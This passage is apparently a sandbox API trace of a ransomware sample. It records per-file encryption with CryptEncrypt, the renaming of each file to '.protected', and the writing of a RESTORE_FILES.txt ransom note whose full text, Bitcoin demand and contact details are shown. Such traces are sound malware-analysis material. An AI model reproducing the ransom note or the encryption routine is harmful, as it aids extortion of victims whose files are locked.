(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch=".txt") returned 0x0 [0091.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch=".rar") returned 0x0 [0091.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0091.141] StrStrW (lpFirst="chucu jadnvk.contact", lpSrch=".zip") returned 0x0 [0091.142] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x499, lpOverlapped=0x0) returned 1 [0091.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.143] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x499, lpOverlapped=0x0) returned 1 [0091.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.143] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.143] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.143] CloseHandle (hObject=0xb4) returned 1 [0091.144] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.protected") returned 73 [0091.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.protected")) returned 1 [0091.144] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.144] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.144] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.144] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.144] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.144] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.144] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.145] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.145] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.145] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.145] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.145] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0091.145] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.145] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0091.145] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.145] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0091.146] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.146] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.146] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.146] CloseHandle (hObject=0xb4) returned 1 [0091.146] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.protected") returned 64 [0091.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.protected")) returned 1 [0091.147] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Windows") returned -1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Program Files") returned -1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Program Files (x86)") returned -1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="$Recycle.bin") returned 1 [0091.147] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="System Volume Information") returned -1 [0091.147] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrIW (lpFirst="lulcit amkdfe.contact", lpSrch=".protected") returned 0x0 [0091.147] lstrcmpW (lpString1="lulcit amkdfe.contact", lpString2="RESTORE_FILES.txt") returned -1 [0091.147] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.147] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch=".txt") returned 0x0 [0091.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch=".rar") returned 0x0 [0091.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0091.147] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch=".zip") returned 0x0 [0091.147] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x496, lpOverlapped=0x0) returned 1 [0091.148] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.149] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x496, lpOverlapped=0x0) returned 1 [0091.149] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.149] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.149] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.149] CloseHandle (hObject=0xb4) returned 1 [0091.149] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.protected") returned 74 [0091.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.protected")) returned 1 [0091.150] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Windows") returned -1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Program Files") returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="Program Files (x86)") returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="$Recycle.bin") returned 1 [0091.150] lstrcmpiW (lpString1="sikvnb huvuib.contact", lpString2="System Volume Information") returned -1 [0091.150] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.150] StrStrIW (lpFirst="sikvnb huvuib.contact", lpSrch=".protected") returned 0x0 [0091.150] lstrcmpW (lpString1="sikvnb huvuib.contact", lpString2="RESTORE_FILES.txt") returned 1 [0091.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.151] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch=".txt") returned 0x0 [0091.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.151] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch=".rar") returned 0x0 [0091.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0091.151] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch=".zip") returned 0x0 [0091.151] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x494, lpOverlapped=0x0) returned 1 [0091.152] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.152] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x494, lpOverlapped=0x0) returned 1 [0091.152] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.152] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.152] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.152] CloseHandle (hObject=0xb4) returned 1 [0091.153] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.protected") returned 74 [0091.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.protected")) returned 1 [0091.153] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.153] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.153] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\RESTORE_FILES.txt") returned 60 [0091.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.154] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.154] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.154] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.154] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.154] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.154] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.155] CloseHandle (hObject=0xa4) returned 1 [0091.155] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="Windows") returned -1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0091.155] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0091.155] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned 41 [0091.155] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0091.155] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0091.155] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned 43 [0091.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0091.155] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0091.155] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0091.155] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 41 [0091.155] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0091.155] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0091.155] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 43 [0091.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.155] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.155] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.156] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.156] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.156] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.156] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 43 [0091.156] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.156] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.156] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.156] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.156] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.156] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.156] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.156] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.156] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.156] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\..") returned 44 [0091.156] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.156] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.156] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.156] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.156] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="Windows") returned -1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="Program Files") returned -1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="Program Files (x86)") returned -1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="$Recycle.bin") returned 1 [0091.156] lstrcmpiW (lpString1="4CnSrLzCWij.bmp", lpString2="System Volume Information") returned -1 [0091.156] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4CnSrLzCWij.bmp") returned 57 [0091.156] StrStrIW (lpFirst="4CnSrLzCWij.bmp", lpSrch=".protected") returned 0x0 [0091.156] lstrcmpW (lpString1="4CnSrLzCWij.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0091.156] 